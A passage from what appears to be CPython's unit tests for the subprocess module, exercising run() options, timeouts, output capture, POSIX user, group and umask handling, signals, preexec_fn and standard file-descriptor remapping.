fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
ZERO_RETURN_CMD, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_includes_filename(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.call(['/opt/nonexistent_binary', 'with', 'some', 'args'])
self.assertEqual(c.exception.filename, '/opt/nonexistent_binary')
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_with_bad_cwd(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.Popen(['exit', '0'], cwd='/some/nonexistent/directory')
self.assertEqual(c.exception.filename, '/some/nonexistent/directory')
def test_class_getitems(self):
self.assertIsInstance(subprocess.Popen[bytes], types.GenericAlias)
self.assertIsInstance(subprocess.CompletedProcess[str], types.GenericAlias)
class RunFuncTestCase(BaseTestCase):
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# call() function with sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError):
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c:
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = subprocess.run(ZERO_RETURN_CMD, check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
output = self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
cp = self.run_python((
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
def test_run_with_pathlike_path(self):
# bpo-31961: test run(pathlike_object)
# the name of a command that can be run without
# any arguments that exit fast
prog = 'tree.com' if mswindows else 'ls'
path = shutil.which(prog)
if path is None:
self.skipTest(f'{prog} required for this test')
path = FakePath(path)
res = subprocess.run(path, stdout=subprocess.DEVNULL)
self.assertEqual(res.returncode, 0)
with self.assertRaises(TypeError):
subprocess.run(path, stdout=subprocess.DEVNULL, shell=True)
def test_run_with_bytes_path_and_arguments(self):
# bpo-31961: test run([bytes_object, b'additional arguments'])
path = os.fsencode(sys.executable)
args = [path, '-c', b'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_run_with_pathlike_path_and_arguments(self):
# bpo-31961: test run([pathlike_object, 'additional arguments'])
path = FakePath(sys.executable)
args = [path, '-c', 'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_capture_output(self):
cp = self.run_python(("import sys;"
"sys.stdout.write('BDFL'); "
"sys.stderr.write('FLUFL')"),
capture_output=True)
self.assertIn(b'BDFL', cp.stdout)
self.assertIn(b'FLUFL', cp.stderr)
def test_stdout_with_capture_output_arg(self):
# run() refuses to accept 'stdout' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stdout and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stdout=tf)
self.assertIn('stdout', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
def test_stderr_with_capture_output_arg(self):
# run() refuses to accept 'stderr' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stderr and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stderr=tf)
self.assertIn('stderr', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
# This test _might_ wind up a bit fragile on loaded build+test machines
# as it depends on the timing with wide enough margins for normal situations
# but does assert that it happened "soon enough" to believe the right thing
# happened.
@unittest.skipIf(mswindows, "requires posix like 'sleep' shell command")
def test_run_with_shell_timeout_and_capture_output(self):
"""Output capturing after a timeout mustn't hang forever on open filehandles."""
before_secs = time.monotonic()
try:
subprocess.run('sleep 3', shell=True, timeout=0.1,
capture_output=True) # New session unspecified.
except subprocess.TimeoutExpired as exc:
after_secs = time.monotonic()
stacks = traceback.format_exc() # assertRaises doesn't give this.
else:
self.fail("TimeoutExpired not raised.")
self.assertLess(after_secs - before_secs, 1.5,
msg="TimeoutExpired was delayed! Bad traceback:\n```\n"
f"{stacks}```")
def _get_test_grp_name():
for name_group in ('staff', 'nogroup', 'grp', 'nobody', 'nfsnobody'):
if grp:
try:
grp.getgrnam(name_group)
except KeyError:
continue
return name_group
else:
raise unittest.SkipTest('No identified group name to use for this test on this platform.')
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
# This avoids hard coding the errno value or the OS perror()
# string and instead capture the exception that we want to see
# below for comparison.
desired_exception = e
else:
self.fail("chdir to nonexistent directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
# We mock the __del__ method for Popen in the next two tests
# because it does cleanup based on the pid returned by fork_exec
# along with issuing a resource warning if it still exists. Since
# we don't actually spawn a process in these tests we can forego
# the destructor. An alternative would be to set _child_created to
# False before the destructor is called but there is no easy way
# to do that
class PopenNoDestructor(subprocess.Popen):
def __del__(self):
pass
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_normal(self, fork_exec):
"""Test error passing done through errpipe_write in the good case"""
def proper_error(*args):
errpipe_write = args[13]
# Write the hex for the error code EISDIR: 'is a directory'
err_code = '{:x}'.format(errno.EISDIR).encode()
os.write(errpipe_write, b"OSError:" + err_code + b":")
return 0
fork_exec.side_effect = proper_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(IsADirectoryError):
self.PopenNoDestructor(["non_existent_command"])
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_bad_data(self, fork_exec):
"""Test error passing done through errpipe_write where its not
in the expected format"""
error_data = b"\xFF\x00\xDE\xAD"
def bad_error(*args):
errpipe_write = args[13]
# Anything can be in the pipe, no assumptions should
# be made about its encoding, so we'll write some
# arbitrary hex bytes to test it out
os.write(errpipe_write, error_data)
return 0
fork_exec.side_effect = bad_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(subprocess.SubprocessError) as e:
self.PopenNoDestructor(["non_existent_command"])
self.assertIn(repr(error_data), str(e.exception))
@unittest.skipIf(not os.path.exists('/proc/self/status'),
"need /proc/self/status")
def test_restore_signals(self):
# Blindly assume that cat exists on systems with /proc/self/status...
default_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=False)
for line in default_proc_status.splitlines():
if line.startswith(b'SigIgn'):
default_sig_ign_mask = line
break
else:
self.skipTest("SigIgn not found in /proc/self/status.")
restored_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=True)
for line in restored_proc_status.splitlines():
if line.startswith(b'SigIgn'):
restored_sig_ign_mask = line
break
self.assertNotEqual(default_sig_ign_mask, restored_sig_ign_mask,
msg="restore_signals=True should've unblocked "
"SIGPIPE and friends.")
def test_start_new_session(self):
# For code coverage of calling setsid(). We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c", "import os; print(os.getsid(0))"],
start_new_session=True)
except OSError as e:
if e.errno != errno.EPERM:
raise
else:
parent_sid = os.getsid(0)
child_sid = int(output)
self.assertNotEqual(parent_sid, child_sid)
@unittest.skipUnless(hasattr(os, 'setreuid'), 'no setreuid on platform')
def test_user(self):
# For code coverage of the user parameter. We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
uid = os.geteuid()
test_users = [65534 if uid != 65534 else 65533, uid]
name_uid = "nobody" if sys.platform != 'darwin' else "unknown"
if pwd is not None:
try:
pwd.getpwnam(name_uid)
test_users.append(name_uid)
except KeyError:
# unknown user name
name_uid = None
for user in test_users:
# posix_spawn() may be used with close_fds=False
for close_fds in (False, True):
with self.subTest(user=user, close_fds=close_fds):
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getuid())"],
user=user,
close_fds=close_fds)
except PermissionError: # (EACCES, EPERM)
pass
except OSError as e:
if e.errno not in (errno.EACCES, errno.EPERM):
raise
else:
if isinstance(user, str):
user_uid = pwd.getpwnam(user).pw_uid
else:
user_uid = user
child_user = int(output)
self.assertEqual(child_user, user_uid)
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=-1)
with self.assertRaises(OverflowError):
subprocess.check_call(ZERO_RETURN_CMD,
cwd=os.curdir, env=os.environ, user=2**64)
if pwd is None and name_uid is not None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=name_uid)
@unittest.skipIf(hasattr(os, 'setreuid'), 'setreuid() available on platform')
def test_user_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=65535)
@unittest.skipUnless(hasattr(os, 'setregid'), 'no setregid() on platform')
def test_group(self):
gid = os.getegid()
group_list = [65534 if gid != 65534 else 65533]
name_group = _get_test_grp_name()
if grp is not None:
group_list.append(name_group)
for group in group_list + [gid]:
# posix_spawn() may be used with close_fds=False
for close_fds in (False, True):
with self.subTest(group=group, close_fds=close_fds):
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getgid())"],
group=group,
close_fds=close_fds)
except PermissionError: # (EACCES, EPERM)
pass
else:
if isinstance(group, str):
group_gid = grp.getgrnam(group).gr_gid
else:
group_gid = group
child_group = int(output)
self.assertEqual(child_group, group_gid)
# make sure we bomb on negative values
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=-1)
with self.assertRaises(OverflowError):
subprocess.check_call(ZERO_RETURN_CMD,
cwd=os.curdir, env=os.environ, group=2**64)
if grp is None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=name_group)
@unittest.skipIf(hasattr(os, 'setregid'), 'setregid() available on platform')
def test_group_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=65535)
@unittest.skipUnless(hasattr(os, 'setgroups'), 'no setgroups() on platform')
def test_extra_groups(self):
gid = os.getegid()
group_list = [65534 if gid != 65534 else 65533]
name_group = _get_test_grp_name()
perm_error = False
if grp is not None:
group_list.append(name_group)
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os, sys, json; json.dump(os.getgroups(), sys.stdout)"],
extra_groups=group_list)
except OSError as ex:
if ex.errno != errno.EPERM:
raise
perm_error = True
else:
parent_groups = os.getgroups()
child_groups = json.loads(output)
if grp is not None:
desired_gids = [grp.getgrnam(g).gr_gid if isinstance(g, str) else g
for g in group_list]
else:
desired_gids = group_list
if perm_error:
self.assertEqual(set(child_groups), set(parent_groups))
else:
self.assertEqual(set(desired_gids), set(child_groups))
# make sure we bomb on negative values
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, extra_groups=[-1])
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD,
cwd=os.curdir, env=os.environ,
extra_groups=[2**64])
if grp is None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD,
extra_groups=[name_group])
@unittest.skipIf(hasattr(os, 'setgroups'), 'setgroups() available on platform')
def test_extra_groups_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, extra_groups=[])
@unittest.skipIf(mswindows or not hasattr(os, 'umask'),
'POSIX umask() is not available.')
def test_umask(self):
tmpdir = None
try:
tmpdir = tempfile.mkdtemp()
name = os.path.join(tmpdir, "beans")
# We set an unusual umask in the child so as a unique mode
# for us to test the child's touched file for.
subprocess.check_call(
[sys.executable, "-c", f"open({name!r}, 'w').close()"],
umask=0o053)
# Ignore execute permissions entirely in our test,
# filesystems could be mounted to ignore or force that.
st_mode = os.stat(name).st_mode & 0o666
expected_mode = 0o624
self.assertEqual(expected_mode, st_mode,
msg=f'{oct(expected_mode)} != {oct(st_mode)}')
finally:
if tmpdir is not None:
shutil.rmtree(tmpdir)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_CalledProcessError_str_signal(self):
err = subprocess.CalledProcessError(-int(signal.SIGABRT), "fake cmd")
error_string = str(err)
# We're relying on the repr() of the signal.Signals intenum to provide
# the word signal, the signal name and the numeric value.
self.assertIn("signal", error_string.lower())
# We're not being specific about the signal name as some signals have
# multiple names and which name is revealed can vary.
self.assertIn("SIG", error_string)
self.assertIn(str(signal.SIGABRT), error_string)
def test_CalledProcessError_str_unknown_signal(self):
err = subprocess.CalledProcessError(-9876543, "fake cmd")
error_string = str(err)
self.assertIn("unknown signal 9876543.", error_string)
def test_CalledProcessError_str_non_zero(self):
err = subprocess.CalledProcessError(2, "fake cmd")
error_string = str(err)
self.assertIn("non-zero exit status 2.", error_string)
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
with p:
self.assertEqual(p.stdout.read(), b"apple")
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
self.assertTrue(
subprocess._posixsubprocess,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
def raise_runtime_error():
raise RuntimeError("this shouldn't escape")
enabled = gc.isenabled()
orig_gc_disable = gc.disable
orig_gc_isenabled = gc.isenabled
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
gc.disable = raise_runtime_error
self.assertRaises(RuntimeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
del gc.isenabled # force an AttributeError
self.assertRaises(AttributeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
finally:
gc.disable = orig_gc_disable
gc.isenabled = orig_gc_isenabled
if not enabled:
gc.disable()
@unittest.skipIf(
sys.platform == 'darwin', 'setrlimit() seems to fail on OS X')
def test_preexec_fork_failure(self):
# The internal code did not preserve the previous exception when
# re-enabling garbage collection
try:
from resource import getrlimit, setrlimit, RLIMIT_NPROC
except ImportError as err:
self.skipTest(err) # RLIMIT_NPROC is specific to Linux and BSD
limits = getrlimit(RLIMIT_NPROC)
[_, hard] = limits
setrlimit(RLIMIT_NPROC, (0, hard))
self.addCleanup(setrlimit, RLIMIT_NPROC, limits)
try:
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
except BlockingIOError:
# Forking should raise EAGAIN, translated to BlockingIOError
pass
else:
self.skipTest('RLIMIT_NPROC had no effect; probably superuser')
def test_args_string(self):
# args is a string
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that.)
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
self.assertEqual(out, b'apple')
self.assertEqual(err, b'orange')
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = os.read(temp_fds[0], 1024).strip()
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = os.read(stderr_no, 1024).strip()
finally:
self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def _check_swap_std_fds_with_one_closed(self, from_fds, to_fds):
saved_fds = self._save_fds(range(3))
try:
for from_fd in from_fds:
with tempfile.TemporaryFile() as f:
os.dup2(f.fileno(), from_fd)
fd_to_close = (set(range(3)) - set(from_fds)).pop()
os.close(fd_to_close)
arg_names = ['stdin', 'stdout', 'stderr']
kwargs = {}
for from_fd, to_fd in zip(from_fds, to_fds):
kwargs[arg_names[to_fd]] = from_fd
code = textwrap.dedent(r'''
import os, sys
